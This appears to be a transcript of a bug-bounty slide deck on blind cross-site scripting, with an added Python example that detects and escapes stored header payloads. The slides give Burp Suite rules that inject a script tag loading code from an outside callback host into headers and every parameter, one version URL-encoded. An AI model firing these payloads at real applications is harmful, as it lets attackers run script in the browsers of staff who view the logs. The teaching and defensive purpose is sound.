3. What is Blind XSS?
• In general, the XSS payload is not directly reflected back in the web application, and the page where it eventually renders (the vulnerable endpoint) is not publicly visible to the tester.
4. How does blind XSS work?
• They occur when the attacker input is saved by the web server and executed as a malicious script in another part of the application or in another application.
- Acunetix
6. Where to look for BXSS?
Everywhere, for example:
User-Agent header
URL parameters
Referer header
Chat applications
Contact/feedback forms
7. Some techniques to find BXSS
• Match and Replace (Burp Suite)
• Regex (matches the whole header line):
^User-Agent:.*$
^Referer:.*$
• Replace with:
User-Agent: test"><script src=https://your.bxss.in></script>
8. AutoRepeater (Burp Suite extension)
• Match and Replace
• Request parameter value:
Regex: .*
• Replace with (URL-encoded):
blindxss%22%3E%3Cscript%20src=https://test.bxss.in%3E%3C/script%3E
https://portswigger.net/bappstore/f89f2837c22c4ab4b772f31522647ed8
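The probes in slides 7 and 8 only fire if something downstream renders the stored header unencoded, which is the second-context sink slide 4 describes. As an added example (not from the original deck), this Python shows a log viewer that interpolates stored User-Agent and Referer values as-is beside the escaped version, plus a check that flags stored header values containing markup; the log records and the example.invalid domain are constructed.

```python
import html
import re

# Constructed sample of a stored request log, as an admin "recent visitors"
# page might read it back later. The second User-Agent mimics the header
# payload shape from slide 7 (domain is a constructed placeholder).
SAMPLE_LOG = [
    {"ip": "203.0.113.7",
     "user_agent": "Mozilla/5.0 (X11; Linux x86_64)",
     "referer": "https://example.invalid/index.html"},
    {"ip": "203.0.113.9",
     "user_agent": 'test"><script src=https://example.invalid/probe.js></script>',
     "referer": "-"},
]

# Markup that a normal client never puts in a request header value.
SUSPICIOUS = re.compile(r"<\s*script\b|javascript:|\bon\w+\s*=", re.IGNORECASE)

FIELDS = ("ip", "user_agent", "referer")


def flag_suspicious(records):
    """Return (ip, field) pairs whose stored header value looks like markup.

    Useful as a detection pass over stored logs: a hit means someone probed
    that header, and the viewers that render it should be checked for escaping.
    """
    hits = []
    for rec in records:
        for field in ("user_agent", "referer"):
            if SUSPICIOUS.search(rec[field]):
                hits.append((rec["ip"], field))
    return hits


def render_row_unsafe(rec):
    """The vulnerable pattern: stored header values interpolated verbatim."""
    return "<tr>" + "".join(f"<td>{rec[k]}</td>" for k in FIELDS) + "</tr>"


def render_row(rec):
    """Hardened: every stored value is HTML-escaped, including quotes."""
    cells = (html.escape(rec[k], quote=True) for k in FIELDS)
    return "<tr>" + "".join(f"<td>{c}</td>" for c in cells) + "</tr>"


if __name__ == "__main__":
    print(flag_suspicious(SAMPLE_LOG))
    print(render_row_unsafe(SAMPLE_LOG[1]))
    print(render_row(SAMPLE_LOG[1]))
```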
9. Replacement for XSS Hunter
• XSS Hunter was a great service for managing blind XSS pages and notifications, but unfortunately it is no longer available.
Replacement:
https://bxsshunter.com